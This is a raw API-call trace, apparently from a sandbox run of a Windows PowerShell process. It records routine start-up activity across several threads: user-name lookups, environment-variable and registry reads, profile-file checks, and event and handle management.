	[0788.985] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0788.985] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd6d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd6d8) returned 0x1
	[0789.879] CoTaskMemFree (pv=0x2884c40) 
	[0789.879] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0789.880] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd718 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd718) returned 1
	[0789.880] CoTaskMemFree (pv=0x22e660) 
	[0789.881] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e2c560*="Available", lpRawData=0x2e2c2f0) returned 1
	[0790.175] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.175] CoTaskMemFree (pv=0x1f3620) 
	[0790.175] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.175] CoTaskMemFree (pv=0x1f3620) 
	[0790.177] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.177] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0790.177] CoTaskMemFree (pv=0x1f3620) 
	[0790.177] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.177] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0790.177] CoTaskMemFree (pv=0x1f3620) 
	[0790.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6f8 | out: phkResult=0xcd6f8*=0x3a4) returned 0x0
	[0790.179] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd67c, lpData=0x0, lpcbData=0xcd678*=0x0 | out: lpType=0xcd67c*=0x1, lpData=0x0, lpcbData=0xcd678*=0x56) returned 0x0
	[0790.179] CoTaskMemAlloc (cb=0x5a) returned 0x286cc50
	[0790.179] RegQueryValueExW (in: hKey=0x3a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd64c, lpData=0x286cc50, lpcbData=0xcd648*=0x56 | out: lpType=0xcd64c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd648*=0x56) returned 0x0
	[0790.180] CoTaskMemFree (pv=0x286cc50) 
	[0790.180] RegCloseKey (hKey=0x3a4) returned 0x0
	[0790.181] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.181] CoTaskMemFree (pv=0x1f3620) 
	[0790.199] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.199] CoTaskMemFree (pv=0x1f3620) 
	[0790.204] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.204] CoTaskMemFree (pv=0x1f3620) 
	[0790.204] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.205] CoTaskMemFree (pv=0x1f3620) 
	[0790.205] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.205] CoTaskMemFree (pv=0x1f3620) 
	[0790.207] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.207] CoTaskMemFree (pv=0x1f3620) 
	[0790.208] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.209] CoTaskMemFree (pv=0x1f3620) 
	[0790.209] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0790.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.209] CoTaskMemFree (pv=0x1f3620) 
	[0792.238] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0792.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.238] CoTaskMemFree (pv=0x1f3620) 
	[0796.457] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f3a60
	[0796.463] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f3b70
	[0799.489] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0799.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.489] CoTaskMemFree (pv=0x1f3c80) 
	[0799.493] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0799.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.493] CoTaskMemFree (pv=0x1f3c80) 
	[0800.396] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd858 | out: phkResult=0xcd858*=0x368) returned 0x0
	[0800.396] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7dc, lpData=0x0, lpcbData=0xcd7d8*=0x0 | out: lpType=0xcd7dc*=0x1, lpData=0x0, lpcbData=0xcd7d8*=0x56) returned 0x0
	[0800.396] CoTaskMemAlloc (cb=0x5a) returned 0x2a5d30
	[0800.396] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7ac, lpData=0x2a5d30, lpcbData=0xcd7a8*=0x56 | out: lpType=0xcd7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd7a8*=0x56) returned 0x0
	[0800.397] CoTaskMemFree (pv=0x2a5d30) 
	[0800.397] RegCloseKey (hKey=0x368) returned 0x0
	[0800.397] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd858 | out: phkResult=0xcd858*=0x368) returned 0x0
	[0800.397] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7dc, lpData=0x0, lpcbData=0xcd7d8*=0x0 | out: lpType=0xcd7dc*=0x1, lpData=0x0, lpcbData=0xcd7d8*=0x56) returned 0x0
	[0800.397] CoTaskMemAlloc (cb=0x5a) returned 0x2a5d30
	[0800.397] RegQueryValueExW (in: hKey=0x368, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7ac, lpData=0x2a5d30, lpcbData=0xcd7a8*=0x56 | out: lpType=0xcd7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd7a8*=0x56) returned 0x0
	[0800.397] CoTaskMemFree (pv=0x2a5d30) 
	[0800.397] RegCloseKey (hKey=0x368) returned 0x0
	[0800.398] CoTaskMemAlloc (cb=0x20c) returned 0x285d970
	[0800.398] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x285d970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0800.398] CoTaskMemFree (pv=0x285d970) 
	[0800.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0800.398] CoTaskMemAlloc (cb=0x20c) returned 0x285d970
	[0800.398] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x285d970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0800.398] CoTaskMemFree (pv=0x285d970) 
	[0800.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0800.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0800.400] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd7c0 | out: lpFileInformation=0xcd7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0800.401] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0800.401] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd7c0 | out: lpFileInformation=0xcd7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0800.401] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0800.401] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd7c0 | out: lpFileInformation=0xcd7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0800.401] SetErrorMode (uMode=0x1) returned 0x1
	[0800.401] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0800.402] SetErrorMode (uMode=0x1) returned 0x1
	[0800.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd7c0 | out: lpFileInformation=0xcd7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0800.402] SetErrorMode (uMode=0x1) returned 0x1
	[0800.404] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0800.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.405] CoTaskMemFree (pv=0x1f3c80) 
	[0800.406] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0800.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.406] CoTaskMemFree (pv=0x1f3c80) 
	[0801.275] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.275] CoTaskMemFree (pv=0x1f3c80) 
	[0801.278] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.278] CoTaskMemFree (pv=0x1f3c80) 
	[0801.281] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.281] CoTaskMemFree (pv=0x1f3c80) 
	[0801.282] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x368
	[0801.282] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x198
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x314
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0801.283] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0801.286] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.286] CoTaskMemFree (pv=0x1f3c80) 
	[0801.288] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0801.289] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd9a0 | out: lpMode=0xcd9a0) returned 1
	[0801.291] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.291] CoTaskMemFree (pv=0x1f3c80) 
	[0801.294] SetEvent (hEvent=0x198) returned 1
	[0801.294] SetEvent (hEvent=0x368) returned 1
	[0801.294] SetEvent (hEvent=0x38c) returned 1
	[0801.294] SetEvent (hEvent=0x390) returned 1
	[0801.295] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0801.297] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0801.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.298] CoTaskMemFree (pv=0x1f3c80) 
	[0801.299] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6f8 | out: phkResult=0xcd6f8*=0x338) returned 0x0
	[0801.299] RegQueryValueExW (in: hKey=0x338, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd67c, lpData=0x0, lpcbData=0xcd678*=0x0 | out: lpType=0xcd67c*=0x0, lpData=0x0, lpcbData=0xcd678*=0x0) returned 0x2

Thread:
	id = 636
	os_tid = 0x141c


Thread:
	id = 651
	os_tid = 0x145c


Thread:
	id = 1065
	os_tid = 0x1464


Thread:
	id = 1075
	os_tid = 0x1818


Thread:
	id = 1088
	os_tid = 0x162c


Thread:
	id = 1120
	os_tid = 0x4c0


Thread:
	id = 1121
	os_tid = 0x1954

	[0570.292] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0641.051] RegCloseKey (hKey=0x2f8) returned 0x0
	[0641.052] RegCloseKey (hKey=0x198) returned 0x0
	[0641.052] RegCloseKey (hKey=0x2fc) returned 0x0
	[0740.275] LocalFree (hMem=0x1f7290) returned 0x0
	[0740.275] RegCloseKey (hKey=0x314) returned 0x0
	[0740.276] LocalFree (hMem=0x1f72c0) returned 0x0
	[0740.276] CloseHandle (hObject=0x198) returned 1
	[0740.276] CloseHandle (hObject=0x13) returned 1
	[0740.277] CloseHandle (hObject=0xf) returned 1
	[0749.869] RegCloseKey (hKey=0x198) returned 0x0
	[0782.494] RegCloseKey (hKey=0x384) returned 0x0
	[0782.494] RegCloseKey (hKey=0x380) returned 0x0
	[0782.495] RegCloseKey (hKey=0x37c) returned 0x0
	[0782.495] RegCloseKey (hKey=0x378) returned 0x0
	[0782.495] RegCloseKey (hKey=0x374) returned 0x0
	[0782.496] RegCloseKey (hKey=0x370) returned 0x0
	[0782.496] RegCloseKey (hKey=0x36c) returned 0x0
	[0782.496] RegCloseKey (hKey=0x344) returned 0x0
	[0782.496] RegCloseKey (hKey=0x3a0) returned 0x0
	[0782.497] RegCloseKey (hKey=0x39c) returned 0x0
	[0782.497] RegCloseKey (hKey=0x364) returned 0x0
	[0782.497] RegCloseKey (hKey=0x360) returned 0x0
	[0782.497] RegCloseKey (hKey=0x35c) returned 0x0
	[0782.498] RegCloseKey (hKey=0x358) returned 0x0
	[0782.498] RegCloseKey (hKey=0x354) returned 0x0
	[0782.498] RegCloseKey (hKey=0x350) returned 0x0
	[0782.499] RegCloseKey (hKey=0x34c) returned 0x0
	[0782.499] RegCloseKey (hKey=0x348) returned 0x0
	[0782.499] RegCloseKey (hKey=0x398) returned 0x0
	[0782.500] RegCloseKey (hKey=0x338) returned 0x0
	[0782.500] RegCloseKey (hKey=0x334) returned 0x0
	[0782.500] RegCloseKey (hKey=0x330) returned 0x0
	[0782.500] RegCloseKey (hKey=0x32c) returned 0x0
	[0782.501] RegCloseKey (hKey=0x328) returned 0x0
	[0782.501] RegCloseKey (hKey=0x324) returned 0x0
	[0782.501] RegCloseKey (hKey=0x320) returned 0x0
	[0782.502] RegCloseKey (hKey=0x31c) returned 0x0
	[0782.502] RegCloseKey (hKey=0x394) returned 0x0
	[0782.502] RegCloseKey (hKey=0x314) returned 0x0
	[0782.502] RegCloseKey (hKey=0x198) returned 0x0
	[0782.502] RegCloseKey (hKey=0x390) returned 0x0
	[0782.503] RegCloseKey (hKey=0x38c) returned 0x0
	[0782.503] RegCloseKey (hKey=0x368) returned 0x0
	[0782.503] RegCloseKey (hKey=0x3a4) returned 0x0
	[0893.104] RegCloseKey (hKey=0x338) returned 0x0

Thread:
	id = 1181
	os_tid = 0x17c4


Thread:
	id = 1691
	os_tid = 0x23a0

	[0802.219] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0802.225] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0802.230] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.230] CoTaskMemFree (pv=0x1f3c80) 
	[0802.232] VirtualQuery (in: lpAddress=0x1c6bdc00, lpBuffer=0x1c6beac0, dwLength=0x30 | out: lpBuffer=0x1c6beac0*(BaseAddress=0x1c6bd000, AllocationBase=0x1bd30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0802.235] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.236] CoTaskMemFree (pv=0x1f3c80) 
	[0802.239] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.239] CoTaskMemFree (pv=0x1f3c80) 
	[0802.242] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.242] CoTaskMemFree (pv=0x1f3c80) 
	[0802.259] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.260] CoTaskMemFree (pv=0x1f3c80) 
	[0802.262] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.262] CoTaskMemFree (pv=0x1f3c80) 
	[0802.264] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0802.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.264] CoTaskMemFree (pv=0x1f3c80) 
	[0803.141] VirtualQuery (in: lpAddress=0x1c6bdeb0, lpBuffer=0x1c6bed70, dwLength=0x30 | out: lpBuffer=0x1c6bed70*(BaseAddress=0x1c6bd000, AllocationBase=0x1bd30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.142] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0803.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.142] CoTaskMemFree (pv=0x1f3c80) 
	[0803.145] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0803.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.145] CoTaskMemFree (pv=0x1f3c80) 
	[0803.145] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0803.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.145] CoTaskMemFree (pv=0x1f3c80) 
	[0803.147] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0803.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.147] CoTaskMemFree (pv=0x1f3c80) 
	[0803.151] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0803.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.152] CoTaskMemFree (pv=0x1f3c80) 
	[0805.142] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.143] CoTaskMemFree (pv=0x1f3c80) 
	[0805.145] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.145] CoTaskMemFree (pv=0x1f3c80) 
	[0805.146] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.146] CoTaskMemFree (pv=0x1f3c80) 
	[0805.149] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.149] CoTaskMemFree (pv=0x1f3c80) 
	[0805.151] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.151] CoTaskMemFree (pv=0x1f3c80) 
	[0805.152] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.152] CoTaskMemFree (pv=0x1f3c80) 
	[0805.154] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.154] CoTaskMemFree (pv=0x1f3c80) 
	[0805.172] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0805.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.173] CoTaskMemFree (pv=0x1f3c80) 
	[0809.302] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0809.302] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0809.302] CoTaskMemFree (pv=0x1f3c80) 
	[0809.305] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
